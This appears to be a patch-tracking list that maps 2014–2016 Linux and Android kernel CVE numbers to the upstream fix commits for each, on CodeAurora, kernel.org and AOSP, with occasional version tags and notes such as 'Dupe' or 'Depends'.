-	Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=f615e40c706708f74cd826d5b19c63025f54c041
-CVE-2014-9872
-	Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=fc787ebd71fa231cc7dd2a0d5f2208da0527096a
-CVE-2014-9873
-	Link - https://us.codeaurora.org/cgit/quic/la//kernel/msm/commit/?id=ef29ae1d40536fef7fb95e4d5bb5b6b57bdf9420
-CVE-2014-9874
-	Link - https://us.codeaurora.org/cgit/quic/la//kernel/msm/commit/?id=56ff68b1f93eaf22e5e0284648fd862dc08c9236
-CVE-2014-9875
-	Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=b77c694b88a994d077316c157168c710696f8805
-CVE-2014-9876
-	Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=7efd393ca08ac74b2e3d2639b0ad77da139e9139
-CVE-2014-9877
-	Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm-3.10/commit/?id=f0c0112a6189747a3f24f20210157f9974477e03
-CVE-2014-9878
-	Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm-3.10/commit/?id=96a62c1de93a44e6ca69514411baf4b3d67f6dee
-CVE-2014-9879
-	Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=ecc8116e1befb3a764109f47ba0389434ddabbe4
-CVE-2014-9880
-	Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=f2a3f5e63e15e97a66e8f5a300457378bcb89d9c
-CVE-2014-9881
-	Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm-3.10/commit/?id=ba3f404a10b3bb7e9c20440837df3cd35c5d0c4b
-CVE-2014-9882
-	Dupe
-	Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=3a4ebaac557a9e3fbcbab4561650abac8298a4d9
-	Link - https://source.codeaurora.org/quic/la/kernel/msm/commit/?id=0f6afe815b1b3f920f3502be654c848bdfe5ef38
-CVE-2014-9883
-	Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=cbf79a67348e48557c0d0bb9bc58391b3f84bc46
-CVE-2014-9884
-	Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=f4948193c46f75e16d4382c4472485ab12b7bd17
-CVE-2014-9885
-	Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm-3.10/commit/?id=a1d5a4cbd5aa8656bc23b40c7cc43941e10f89c3
-CVE-2014-9886
-	Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm-3.10/commit/?id=80be0e249c906704085d13d4ae446f73913fc225
-CVE-2014-9887
-	Link - https://us.codeaurora.org/cgit/quic/la//kernel/msm-3.10/commit/?id=b1bc773cf61265e0e3871b2e52bd6b3270ffc6c3
-CVE-2014-9888
-	Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=f044936caab337a4384fbfe64a4cbae33c7e22a1
-CVE-2014-9889
-	Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm/commit?id=f4e2f2d4ef58c88340774099dff3324ec8baa24a
-CVE-2014-9890
-	Link - https://us.codeaurora.org/cgit/quic/la//kernel/msm-3.10/commit/?id=14e0c8614d2715589583d8a95e33c422d110eb6f
-CVE-2014-9891
-	Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm-3.10/commit/?id=c10f03f191307f7114af89933f2d91b830150094
-CVE-2014-9892
-	Link - https://us.codeaurora.org/cgit/quic/la//kernel/msm-3.10/commit/?id=591b1f455c32206704cbcf426bb30911c260c33e
-CVE-2014-9893
-	Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm-3.10/commit/?id=bfc6eee5e30a0c20bc37495233506f4f0cc4991d
-CVE-2014-9894
-	Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm-3.10/commit/?id=83214431cd02674c70402b160b16b7427e28737f
-CVE-2014-9895
-	Link - https://us.codeaurora.org/cgit/quic/la//kernel/msm/commit/?id=cc4b26575602e492efd986e9a6ffc4278cee53b5
-CVE-2014-9896
-	Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm-3.10/commit/?id=89f2bcf1ac860b0b380e579e9a8764013f263a7d
-CVE-2014-9897
-	Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm-3.10/commit/?id=46135d80765cb70a914f02a6e7b6abe64679ec86
-CVE-2014-9898
-	Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm-3.10/commit/?id=80be0e249c906704085d13d4ae446f73913fc225
-CVE-2014-9899
-	Link - https://us.codeaurora.org/cgit/quic/la//kernel/msm-3.10/commit/?id=8756624acb1e090b45baf07b2a8d0ebde114000e
-CVE-2014-9900
-	Link - https://us.codeaurora.org/cgit/quic/la//kernel/msm-3.10/commit/?id=63c317dbee97983004dffdd9f742a20d17150071
-CVE-2014-9901
-	Link - prima - https://us.codeaurora.org/cgit/quic/la//platform/vendor/qcom-opensource/wlan/prima/commit/?id=637f0f7931dd7265ac1c250dc2884d6389c66bde
-CVE-2014-9902
-	Link - prima - https://us.codeaurora.org/cgit/quic/la//platform/vendor/qcom-opensource/wlan/prima/commit/?id=3b1c44a3a7129dc25abe2c23543f6f66c59e8f50
-	Link - prima - https://us.codeaurora.org/cgit/quic/la//platform/vendor/qcom-opensource/wlan/prima/commit/?id=3b1c44a3a7129dc25abe2c23543f6f66c59e8f50
-CVE-2014-9903
-	Link - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=4efbc454ba68def5ef285b26ebfcfdb605b52755
-CVE-2014-9904
-	Link - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=6217e5ede23285ddfee10d2e4ba0cc2d4c046205
-CVE-2014-9914
-	Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=9709674e68646cee5a24e3000b3558d25412203a
-CVE-2014-9922
-	Depends
-	Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=69c433ed2ecd2d3264efd7afec4439524b319121
-	Link - 3.10 - https://github.com/aosp-mirror/kernel_msm/commit/48a6c91c1d967cc8375621509676a9eabfac5777
-	Link - 3.10 - https://github.com/aosp-mirror/kernel_msm/commit/57bc19ec472ab303209b2d96a59a619c5221594d
-CVE-2014-9940
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=60a2362f769cf549dc466134efe71c8bf9fbaaba
-CVE-2015-3636
-	Link - https://github.com/torvalds/linux/commit/a134f083e79f
-CVE-2015-0569
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=a079d716b5481223f0166c644e9ec7c75a31b02c
-	Link - prima - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/prima/commit/?id=0ffca4f7bca3a8157d8dbaddbcea292c267fb5aa
-CVE-2015-0570
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=8bd73c3452ab22ba9bdbaac5ab12de2ed25fcb9d
-	Link - prima - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/prima/commit/?id=606babd474290e84e5a86f94480f62f4a5ff92ac
-CVE-2015-0571
-	Link - qcacld-2.0 - https://www.codeaurora.org/cgit/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=6feb2faf80a05940618aa2eef2b62e4e2e54f148
-	Link - qcacld-2.0 - https://www.codeaurora.org/cgit/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=fe4208157c899a5de4d6769d13f6620fc32ebfa9
-	Link - qcacld-2.0 - https://www.codeaurora.org/cgit/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=0e53a89bfe0dbb50e0dde9a6960d274386247cd9
-	Link - qcacld-2.0 - https://www.codeaurora.org/cgit/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=88ce639e7a0bba852f193b6f53b7ca1926a09b02
-	Link - qcacld-2.0 - https://www.codeaurora.org/cgit/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=0858d21caf17d56f8d2353590c1ec245073222e0
-	Link - qcacld-2.0 - https://www.codeaurora.org/cgit/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=2905578424256be07e6b9d8c63bb83d40cc52a71
-	Link - qcacld-2.0 - https://www.codeaurora.org/cgit/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=be62ecde85228b91c66fb047e27d25132f56bd0d
-	Link - qcacld-2.0 - https://www.codeaurora.org/cgit/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=aaeeed43f9597631982835481c7cf2621f6455f0
-	Link - qcacld-2.0 - https://www.codeaurora.org/cgit/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=6642bccf3ed8cba176dee7d4bbc21fc4580efb7b
-	Link - qcacld-2.0 - https://www.codeaurora.org/cgit/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=6665a9697b404acf4d2e7d52d9c2b19512c9b239
-	Link - qcacld-2.0 - https://www.codeaurora.org/cgit/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=9eeafd788f53cc37c169b299f91ca9c558b228f9
-	Link - qcacld-2.0 - https://www.codeaurora.org/cgit/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=55bdc6d1c88a100dc4a71bf855b69db522c9b5b5
-	Link - qcacld-2.0 - https://www.codeaurora.org/cgit/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=fb9fb202c71547dba648c9b08d97645c6f42ca6e
-CVE-2015-0572
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=34ad3d34fbff11b8e1210b9da0dac937fb956b61
-CVE-2015-0573
-	Link - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-3.10.git;a=commit;h=e20f20aaed6b6d2fd1667bad9be9ef35103a51df
-CVE-2015-1420
-	Link - 3.2-^3.19 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=8dfc8b9e8432f50606820b40a7d63618d9d61a07
-CVE-2015-1465
-	Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=df4d92549f23e1c037e83323aff58a21b3de7fe0
-CVE-2015-1534
-	Link - https://android.googlesource.com/kernel/msm/+/b3226d8ea5a2d968b1a841fc54b48f5ebdb16846
-CVE-2015-1593
-	Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=4e7c22d447bb6d7e37bfe39ff658486ae78e8d77
-CVE-2015-1805
-	Link - 3.4 - https://android.googlesource.com/kernel/common/+/f7ebfe91b806501808413c8473a300dff58ddbb5
-	Link - 3.10 - https://android.googlesource.com/kernel/common/+/4a5a45669796c5b4617109182e25b321f9f00beb
-	Link - 3.14 - https://android.googlesource.com/kernel/common/+/bf010e99c9bc48002f6bfa1ad801a59bf996270f
-	Link - 3.16 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=a39bf4a8e29c7336c0c72652b7d0dd1cd1b13c51
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=637b58c2887e5e57850865839cc75f59184b23d1
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f0d1bec9d58d4c038d0ac958c9af82be6eb18045
-CVE-2015-2041
-	Link - 3.2 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=88fe14be08a475ad0eea4ca7c51f32437baf41af
-	Link - ^3.19 - https://github.com/torvalds/linux/commit/6b8d9117ccb4f81b1244aafa7bc70ef8fa45fc49
-CVE-2015-2686
-	Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=4de930efc23b92ddf88ce91c405ee645fe6e27ea
-CVE-2015-2922
-	Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=6fd99094de2b83d1d4c8457f2c83483b2828e75a
-CVE-2015-3288
-	Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=6b7339f4c31ad69c8e9c0b2859276e22cf72176d
-CVE-2015-3339
-	Link - 3.2 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=470e517be17dd6ef8670bec7bd7831ea0d3ad8a6
-	Link - ^3.19 - https://github.com/torvalds/linux/commit/8b01fc86b9f425899f8a3a8fc1c47d73c2c20543
-CVE-2015-4170
-	Link - 3.10^ - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=cf872776fc84128bb779ce2b83a37c884c3203ae
-CVE-2015-4177
-	Link - 4.0 - https://github.com/torvalds/linux/commit/cd4a40174b71acd021877341684d8bb1dc8ea4ae
-CVE-2015-5364
-	Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=beb39db59d14990e401e235faf66a6b9b31240b0
-CVE-2015-5366
-	Link - 3.10 - https://review.lineageos.org/163292
-	Link - 3.18 - https://review.lineageos.org/170669
-	Link - ^4.9 - http://git.kernel.org/cgit/linux/kernel/git/tip/tip.git/commit/?id=dfb4357da6ddbdf57d583ba64361c9d792b0e0b1
-CVE-2015-5697
-	Link - ^4.1 - https://github.com/torvalds/linux/commit/b6878d9e03043695dbf3fa1caa6dfc09db225b16
-CVE-2015-5706
-	Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=f15133df088ecadd141ea1907f2c96df67c729f0
-CVE-2015-5707
-	Depends
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=451a2886b6bf90e2fb378f7c46c655450fb96e81
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=fdc81f45e9f57858da6351836507fbcf1b7583ee
-CVE-2015-6619
-	Link - https://android.googlesource.com/device%2Fhtc%2Fflounder-kernel/+/25d3e5d71865a7c0324423fad87aaabb70e82ee4
-CVE-2015-6640
-	Link - https://android.googlesource.com/kernel%2Fcommon/+/69bfe2d957d903521d32324190c2754cb073be15
-CVE-2015-6642
-	Link - https://us.codeaurora.org/cgit/quic/la//kernel/msm-3.18/commit/?id=4ad825ba2968666069740c3e80fe31ed3d0e29ba
-CVE-2015-7509
-	Link - ^3.7 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c9b92530a723ac5ef8e352885a1862b18f31b2f5
-CVE-2015-7515
-	Link - 3.2 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=90eb3c037fe3f0f25f01713a92725a8daa2b41f3
-	Link - ^4.4 - https://github.com/torvalds/linux/commit/8e20cf2bce122ce9262d6034ee5d5b76fbb92f96
-CVE-2015-7550
-	Link - ^4.3 - https://github.com/torvalds/linux/commit/b4a1b4f5047e4f54e194681125c74c0aa64d637d
-CVE-2015-7872
-	Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=f05819df10d7b09f6d1eb6f8534a8f68e5a4fe61
-CVE-2015-8019
-	Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/patch/?id=813658e0c448f2f5fb3301762076ba5e0f61411c
-	Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/patch/?id=f1c121b78e68c03f7fe5e9fa7319e53ad29392f3
-	Link - 4.3 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/patch/?id=197c949e7798fbf28cfadc69d9ca0c2abbf93191
-CVE-2015-8539
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=096fe9eaea40a17e125569f9e657e34cdb6d73bd
-CVE-2015-8543
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=79462ad02e861803b3840cc782248c7359451cd9
-CVE-2015-8575
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=5233252fce714053f0151680933571a2da9cbfb4
-CVE-2015-8785
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3ca8138f014a913f98e6ef40e939868e1e9ea876
-CVE-2015-8830
-	Link - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=4c185ce06dca14f5cea192f5a2c981ef50663f2b
-	Link - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=a70b52ec1aaeaf60f4739edb1b422827cb6f3893
-CVE-2015-8839
-	Link - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=ea3d7209ca01da209cda6f0dea8be9cc4b7a933b
-	Link - https://github.com/aosp-mirror/kernel_msm/commit/f0ac071fc6660c1d8d4b0d0dbe7642dd1274e4a5
-CVE-2015-8937
-	Link - https://us.codeaurora.org/cgit/quic/la//kernel/msm-3.10/commit/?id=c66202b9288cc4ab1c38f7c928fa1005c285c170
-CVE-2015-8938
-	Link - https://us.codeaurora.org/cgit/quic/la//kernel/msm-3.10/commit/?id=51c39420e3a49d1a7f05a77c64369b7623088238
-CVE-2015-8939
-	Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=884cff808385788fa620833c7e2160a4b98a21da
-CVE-2015-8940
-	Link - https://us.codeaurora.org/cgit/quic/la//kernel/msm-3.10/commit/?id=e13ebd727d161db7003be6756e61283dce85fa3b
-CVE-2015-8941
-	Link - https://us.codeaurora.org/cgit/quic/la//kernel/msm-3.10/commit/?id=d4d4d1dd626b21e68e78395bab3382c1eb04877f
-CVE-2015-8942
-	Link - https://us.codeaurora.org/cgit/quic/la//kernel/msm-3.10/commit/?id=9ec380c06bbd79493828fcc3c876d8a53fd3369f
-CVE-2015-8943
-	Link - https://us.codeaurora.org/cgit/quic/la//kernel/msm/commit/?id=ad376e4053b87bd58f62f45b6df2c5544bc21aee
-CVE-2015-8944
-	Link - https://us.codeaurora.org/cgit/quic/la//kernel/msm-3.10/commit/?id=e758417e7c31b975c862aa55d0ceef28f3cc9104
-CVE-2015-8950
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=6e2c437a2d0a85d90d3db85a7471f99764f7bbf8
-CVE-2015-8951
-	Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=ccff36b07bfc49efc77b9f1b55ed2bf0900b1d5b
-	Link - 3.18 - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-3.18.git;a=commit;h=0aed2b7e739f7e528ffd8dac3c0c14deb82c9acf
-CVE-2015-8955
-	Link - https://git.kernel.org/cgit/linux/kernel/git/stable/linux-stable.git/commit/?id=8fff105e13041e49b82f92eef034f363a6b1c071
-CVE-2015-8961
-	Link - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=6934da9238da947628be83635e365df41064b09b
-CVE-2015-8962
-	Link - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=f3951a3709ff50990bf3e188c27d346792103432
-CVE-2015-8963
-	Link - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=12ca6ad2e3a896256f086497a7c7406a547ee373
-CVE-2015-8964
-	Link - https://git.kernel.org/cgit/linux/kernel/git/stable/linux-stable.git/commit/?id=dd42bf1197144ede075a9d4793123f7689e164bc
-CVE-2015-8966
-	Link - 3.15+ - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=76cc404bfdc0d419c720de4daaf2584542734f42
-CVE-2015-8967
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c623b33b4e9599c6ac5076f7db7369eb9869aa04
-CVE-2015-9004
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=c3c87e770458aa004bd7ed3f29945ff436fd6511
-CVE-2016-0723
-	Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=5c17c861a357e9458001f021a7afa7aab9937439
-CVE-2016-0728
-	Link - 3.10 - https://android.googlesource.com/kernel/common/+/9fc5f368bb89b65b591c4f800dfbcc7432e49de5
-	Link - 3.14 - https://android.googlesource.com/kernel/common/+/93faf7ad3d603c33b33e49318e81cf00f3a24a73
-	Link - 3.18 - https://android.googlesource.com/kernel/common/+/ba8bb5774ca7b1acc314c98638cf678ce0beb19a
-	Link - 4.1 - https://android.googlesource.com/kernel/common/+/8a8431507f8f5910db5ac85b72dbdc4ed8f6b308
-CVE-2016-0758
-	Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=23c8a812dc3c621009e4f0e5342aa4e2ede1ceaa
-CVE-2016-0774
-	Link - https://git.kernel.org/cgit/linux/kernel/git/stable/linux-stable.git/commit/fs/pipe.c?id=b381fbc509052d07ccf8641fd7560a25d46aaf1e
-CVE-2016-0801
-	Link - https://android.googlesource.com/kernel/msm/+/68cdc8df1cb6622980b791ce03e99c255c9888af
-CVE-2016-0802
-	Link - https://android.googlesource.com/kernel/msm/+/3fffc78f70dc101add8b82af878d53457713d005
-CVE-2016-0805
-	Link - https://github.com/android/kernel_msm/commit/b3f0b1f694258b3b3debc5256eec94bb2a9eb454
-CVE-2016-0806
-	Link - prima - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-flo-3.4-marshmallow-mr2&id=1fac73337080712109029302599945d1ac36c799
-	Link - prima - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-flo-3.4-marshmallow-mr2&id=e9dcd5aa01734b019c793220531e4ef1d82959f8
-	Link - prima - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-flo-3.4-marshmallow-mr2&id=fd13b59e5a75b761f68fe34f09df1dce7a49acc2
-	Link - prima - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-flo-3.4-marshmallow-mr2&id=fbb8f120ee729d47869f0bebe5bc31e83bcf2876
-	Link - prima - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-flo-3.4-marshmallow-mr2&id=518fd80981eefa9715e0851260b2c7aeb86551d7
-	Link - prima - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-flo-3.4-marshmallow-mr2&id=86fd66a451b2549f990b71013220e0a3f46b5a00
-	Link - prima - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-flo-3.4-marshmallow-mr2&id=4a75c965d2505ca2490a365a27309cc9dd68b2d1
-	Link - prima - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-flo-3.4-marshmallow-mr2&id=ede034fd604a9cdb20eb7accdaec4a8e70ffac41
-	Link - prima - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-flo-3.4-marshmallow-mr2&id=aaf7476fa7fdc8d1865f20217c7c57ce561e03f7
-	Link - prima - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-flo-3.4-marshmallow-mr2&id=973503f0d411e13e01fa10c5ea802dcb8a12cf85
-	Link - prima - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-flo-3.4-marshmallow-mr2&id=34953f9f66d9cd36616c5271a7d285b31d9142c2
-	Link - prima - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-flo-3.4-marshmallow-mr2&id=72d3908cc1bcb075015f1b86001f4292ac41d38a
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-bullhead-3.10-nougat-mr2&id=055561f40f2baa5cdd74f952be55b61a3907279a
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-bullhead-3.10-nougat-mr2&id=f31e58289c8ebded58ffe1d4709e2f878765b0a6
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-bullhead-3.10-nougat-mr2&id=255dd931573beb3afca15909f483f26db22a5c98
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-bullhead-3.10-nougat-mr2&id=d4b451bd06ad53ed785cbda4272c54788b1537d4
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-bullhead-3.10-nougat-mr2&id=2882941530cbf804e280f235f7f8d76179a423fe
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-bullhead-3.10-nougat-mr2&id=825827ab2aa271f23f48aa683046a3aa3f7fe90e
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-bullhead-3.10-nougat-mr2&id=27d3007a7635ccca7ae9bfb98c89724652dcbc3b
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-bullhead-3.10-nougat-mr2&id=89c3372735486a2f7f6b35298fcf246e7e177ac0
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-bullhead-3.10-nougat-mr2&id=e2addf5aa2c7dfc537c2b80d8cc1cb5640346535
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-bullhead-3.10-nougat-mr2&id=e474427496ccb784878e10978f25b6e85de68850
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-bullhead-3.10-nougat-mr2&id=967f88782e93809cfb27a60b82a3a069d2a52fc4
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-bullhead-3.10-nougat-mr2&id=2f7ecc8b88843b3b53bd7d2328f0d53f3794f456
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-bullhead-3.10-nougat-mr2&id=9fd4483e08349eb1570c42da8acbac33e70a6e02
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-bullhead-3.10-nougat-mr2&id=fb3616763bd5909e86cddd19f3569a26b4f93f49
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-bullhead-3.10-nougat-mr2&id=ca7c085fb70861a55d9d3a46de012a3e0998ca61
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-bullhead-3.10-nougat-mr2&id=f66afdc6840e7647a965487194873826de57e655
-CVE-2016-0819
-	Link - https://source.codeaurora.org/quic/la/kernel/msm/commit/?id=e32c1b1a3d368afe1b09e81b3087ab8810282e93
-CVE-2016-0821
-	Link - https://github.com/torvalds/linux/commit/8a5e5e02fc83aaf67053ab53b359af08c6c49aaf
-CVE-2016-0823
-	Link - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=ab676b7d6fbf4b294bf198fb27ade5b0e865c7ce
-CVE-2016-0843
-	Link - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-3.10.git;a=commit;h=a599a7a83745820b3e1bee9d4b625bd54337e4d0
-CVE-2016-0844
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=90a9da2ea95e86b4f0ff493cd891a11da0ee67aa
-CVE-2016-10044
-	Link - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=22f6b4d34fcf039c63a94e7670e0da24f8575a5a
-	Link - https://android.googlesource.com/kernel/msm/+/689ea150ab61cb193268d4b7f68de68acf207db4
-	Link - https://android.googlesource.com/kernel/msm/+/bc02d1d9f5d0e0610504c24b05fef54726ba1a1b
-CVE-2016-10088
-	Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=128394eff343fc6d2f32172f03e24829539c5835
-CVE-2016-10153
-	Link - 4.9 - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=a45f795c65b479b4ba107b6ccde29b896d51ee98
-CVE-2016-10154
-	Link - 4.9 - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=06deeec77a5a689cc94b21a8a91a76e42176685d
-CVE-2016-10200
-	Link - https://git.kernel.org/cgit/linux/kernel/git/stable/linux-stable.git/commit/?id=32c231164b762dddefa13af5a0101032c70b50ef
-CVE-2016-10208
-	FIXME
-	Link - 3.10-^3.16 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?h=v3.16.44&id=cde863587b6809fdf61ea3c5391ecf06884b5516
-CVE-2016-10229
-	Link - http://git.kernel.org/cgit/linux/kernel/git/stable/linux-stable.git/commit/?id=197c949e7798fbf28cfadc69d9ca0c2abbf93191
-CVE-2016-10230
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=bd9a8fc6d7f6bd1a0b936994630006de450df657
-CVE-2016-10231
